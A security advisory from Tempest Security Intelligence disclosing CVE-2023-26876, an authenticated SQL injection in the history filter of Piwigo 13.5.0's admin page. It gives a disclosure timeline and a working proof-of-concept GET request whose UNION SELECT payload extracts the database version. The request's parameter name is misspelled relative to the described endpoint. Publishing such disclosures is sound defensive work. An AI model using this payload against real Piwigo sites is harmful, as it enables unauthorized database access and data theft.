Piwigo 13.5.0 SQL Injection

`=====[ Tempest Security Intelligence - ADV-03/2023  
]==========================  
  
Piwigo - Version 13.5.0  
  
Author: Rodolfo Tavares  
  
Tempest Security Intelligence - Recife, Pernambuco - Brazil  
  
=====[ Table of Contents]==================================================  
* Overview  
* Detailed description  
* Timeline of disclosure  
* Thanks & Acknowledgments  
* References  
  
=====[ Vulnerability  
Information]=============================================  
* Class: improper Neutralization of Special Elements used in an SQL Command  
('SQL injection') [CWE-89] improper Neutralization of Special Elements used  
in an SQL Command ('SQL Injection')  
* CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H  
* CVE-2023-26876  
  
=====[ Overview]========================================================  
* System affected : Piwigo - Version 13.5.0  
* Software Version : Version 13.5.0 (other versions may also be affected).  
* Impact : Piwigo 13.5.0 is vulnerable to SQL injection via  
/filter_user_id parameter to the  
admin.php?page=history&filter_image_id=&filter_user_id endpoint. An  
attacker can exploit this by  
executing SQL injection code to retrieve sensitive (P1) information and  
performing unintended actions.  
  
=====[ Detailed  
description]=================================================  
  
An authenticated user could run SQLi commands in the application and  
retrieve sensitive information (P1) and database information. Using the  
endpoint  
http://localhost/admin.php?page=history&filter_image_id=&filter_user_id. To  
explore just execute the following request:  
  
GET  
/piwigo/admin.php?page=history&filter_image_id=v3cna&filder_user_id=1%20UNION%20ALL%20SELECT  
%20CONCAT(0x4141414141,IFNULL(CAST(VERSION()%20AS%20NCHAR),0x20),0x4141414141)--%20--  
HTTP/1.1  
Host: localhost  
Cookie: pwg_id=cookies  
  
Check the value contained in the *filter_image_id* variable at the request  
response.  
  
  
=====[ Timeline of  
disclosure]===============================================  
  
12/Fev/2023 - Responsible disclosure was initiated with the vendor.  
  
17/Fev/2023 - Piwigo confirmed the issue;  
  
08/Mar/2023 - CVE-2023-26876 was assigned and reserved.  
  
09/Mar/2023 - The vendor fixed the vulnerability SQL Injection.  
  
=====[ Thanks & Acknowledgments]========================================  
  
* fxo,ravs  
* Henrique Arcoverde < henrique.arcoverde () tempest.com.br >  
* Tempest Security Intelligence / Tempest's Pentest Team [3]  
  
=====[ References ]=====================================================  
  
[1][https://cwe.mitre.org/data/definitions/89.html]  
  
[2][https://github.com/Piwigo/Piwigo/issues/1876]  
  
[3][https://www.tempest.com.br|http://www.tempest.com.br/]  
  
[4][https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26876]  
  
=====[ EOF ]===========================================================  
  
--  
  
--   
  
*Esta mensagem é para uso exclusivo de seu destinatário e pode conter   
informações privilegiadas e confidenciais. Todas as informações aqui   
contidas devem ser tratadas como confidenciais e não devem ser divulgadas a   
terceiros sem o prévio consentimento por escrito da Tempest. Se você não é   
o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste   
caso, por favor, notifique o remetente da mesma e destrua imediatamente a   
mensagem.*  
  
*  
*  
*This message is intended solely for the use of its   
addressee and may contain privileged or confidential information. All   
information contained herein shall be treated as confidential and shall not   
be disclosed to any third party without Tempest’s prior written approval.   
If you are not the addressee you should not distribute, copy or file this   
message. In this case, please notify the sender and destroy its contents   
immediately.**  
*  
*  
*  
  
`